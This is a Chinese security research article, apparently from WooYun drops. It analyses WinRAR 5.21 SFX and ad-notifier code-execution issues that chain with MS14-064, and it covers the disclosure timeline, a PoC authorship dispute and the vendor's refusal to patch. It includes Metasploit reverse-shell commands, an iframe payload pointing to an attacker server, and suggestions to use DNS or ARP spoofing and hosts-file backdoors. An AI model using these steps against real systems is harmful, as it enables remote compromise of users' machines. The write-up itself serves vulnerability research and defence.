原文地址:http://drops.wooyun.org/papers/9470

0x00 前言

上月底，WinRAR 5.21被曝出代碼執行漏洞,Vulnerability Lab將此漏洞評為高危級，危險系數定為9(滿分為10)，與此同時安全研究人員Mohammad Reza Espargham發布了PoC，實現了用戶打開SFX文件時隱蔽執行攻擊代碼，但是WinRAR官方RARLabs認為該功能是軟件安裝必備，沒有必要發布任何修復補丁或升級版本。

本以為就此可以跳過該漏洞，但深入研究后發現了更加有趣的事情。

0x01 WinRar 5.21 - SFX OLE 代碼執行漏洞

簡要介紹一下WinRar 5.21 - SFX OLE 代碼執行漏洞

1、相關概念

SFX： SelF-eXtracting的縮寫，中文翻譯自解壓文件，是壓縮文件的一種，其可以在沒有安裝壓縮軟件的情況下執行解壓縮

MS14-064： Microsoft Windows OLE遠程代碼執行漏洞，影響Win95+IE3 – Win10+IE11全版本，實際使用時在win7以上系統由于IE存在沙箱機制，啟動白名單以外的進程會彈出提示，如圖

2、漏洞原理

sfx文件在創建時支持添加html腳本，但又不會受IE沙箱限制，如果主機存在MS14-064漏洞，在打開包含MS14-064 exp的sfx文件后，即可隱蔽執行任意代碼

3、測試環境

win7 x86
存在MS14-064漏洞
安裝WinRar 5.21

4、測試過程

實現相對簡單，因此只作簡要介紹

（1）搭建server

use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.40.131
set LPORT 1234
exploit

如圖

（2）生成SFX

選擇一個文件右鍵并添加到壓縮文件
選中Create SFX archive
點擊Advanced
點擊SFX options
點擊Text and icon

在Text to display in SFX windows中輸入如下代碼：

<iframe src="http://192.168.40.131:8080/YrrArF9oTAQ7j"></iframe>

（3）運行sfx文件

雙擊后meterpreter即上線

5、分析

1. 這種在sfx文件中添加html代碼的方法很久以前已經出現，比如早在08年已存在的Winrar掛馬 相關鏈接：http://www.2cto.com/Article/200804/25081.html
2. 此漏洞的亮點在于使得MS14-064漏洞exp可以逃脫IE沙箱的限制
3. 發現是否包含SFX OLE 代碼執行漏洞的方法：遇到后綴為.exe的壓縮文件，右鍵-屬性-注釋，查看其中的內容如圖

0x02 poc之謎

Vulnerability Lab和Malwarebytes以及各大網站夸大漏洞危害本就十分有趣，而poc作者的歸屬又引來了更加有趣的事情。

接下來根據搜集的信息整理出如下時間節點：

1、seclists.org曝出WinRAR 5.21代碼執行漏洞

文中公開Mohammad Reza Espargham的poc

日期：28/09/2015

相關鏈接：http://seclists.org/fulldisclosure/2015/Sep/106

2、WinRar官方RARLabs作出第一次回應

限制SFX模塊中的HTML功能會影響正常用戶使用，而且攻擊者仍可利用舊版SFX模塊、來自非UnRAR源代碼的自定義模塊、或者自建代碼存檔進行攻擊 所以RARLabs拒絕為此提供補丁并再次提醒用戶，無論任何文件，都應該確認其來源是否可信

相關鏈接：http://www.rarlab.com/vuln_sfx_html.htm

3、RARLabs作出第二次回應

指出該漏洞夸大其辭毫無意義，建議用戶更多去關注windows系統的安全，而不是WinRar軟件的本身 在最后提到R-73eN ( RioSherri )舉報Mohammad Reza Espargham抄襲其poc代碼

相關鏈接：http://www.rarlab.com/vuln_sfx_html2.htm

4、0day.today或許可以證明存在抄襲

（1） R-73eN首發poc

日期：25/09/2015

相關鏈接:http://0day.today/exploit/24292

（2） Mohammad Reza Espargham隨后發布poc

日期：26-09-2015

相關鏈接:http://cn.0day.today/exploit/24296

5、R-73eN為證明實力公布第二個漏洞WinRAR(過期通知) OLE遠程代碼執行漏洞poc

日期：30-09-2015

相關鏈接:http://0day.today/exploit/24326

6、RARLabs針對R-73eN公布的第二個漏洞作出回應，拒絕修復

-試用版WinRaR會彈出提示注冊的窗口，該漏洞被利用存在可能
-利用條件：
    網絡被劫持
    未安裝MS14-064漏洞補丁
-但是又指出如果滿足利用條件，那么系統本身已經不安全，早已超出WinRaR軟件自身范疇
-因此拒絕為此漏洞更新補丁

相關鏈接:http://www.rarlab.com/vuln_web_html.htm

0x03 WinRAR - (過期通知&廣告) OLE 遠程代碼執行漏洞

雖然WinRAR(過期通知) OLE遠程代碼執行漏洞也被RARLabs忽略，但其中的思路很是有趣，當然R-73eN公布的poc需要作部分修改來適用更多winRAR環境

1、相關知識

我們在使用WinRAR的時候常常會遇到如下情況：

打開WinRAR時會彈出廣告，提示用戶付費去掉廣告，而不同版本WinRaR廣告的鏈接會存在差異
英文版目前最新為5.30 beta5
中文版目前最新為5.21
英文版廣告鏈接：http://www.win-rar.com/notifier/
中文版廣告鏈接：http://www.winrar.com.cn/ad/***

2、漏洞原理

WinRAR默認會訪問特定網址，如果能夠劫持并替換為MS14-064的攻擊代碼，那么遠程執行任意代碼不在話下，當然也能逃脫IE沙箱限制

3、測試環境

win7 x86
存在MS14-064漏洞
安裝WinRar 5.21 cn

4、測試過程

（1）搭建server 下載poc，相關鏈接：http://0day.today/exploit/24326

poc需要作細微修改（此處暫不提供修改方法），執行python腳本，如圖

注：如果了解MS14-064漏洞原理，此處修改輕而易舉

（2）重定向http://www.winrar.com.cn至server ip

可使用arp欺騙和dns欺騙

（3）使用WinRar打開任意文件

默認彈出廣告，觸發漏洞，彈出計算器，如圖

5、分析

1. 雖然該漏洞條件限制相對多，但該思路很有啟發性，可以嘗試利用其他軟件默認彈出網頁的情況
2. 可以通過修改主機host文件永久更改廣告鏈接至serverip，最終實現一種另類的后門啟動方式
3. 針對此漏洞的防范:
   • 阻止網絡被劫持
   • 安裝MS14-064漏洞補丁

0x04 小結

WinRar的漏洞相對較少，但如果結合其他攻擊方式能否突破其官方宣稱的安全邏輯，值得繼續研究。

本文由三好學生原創并首發于烏云drops，轉載請注明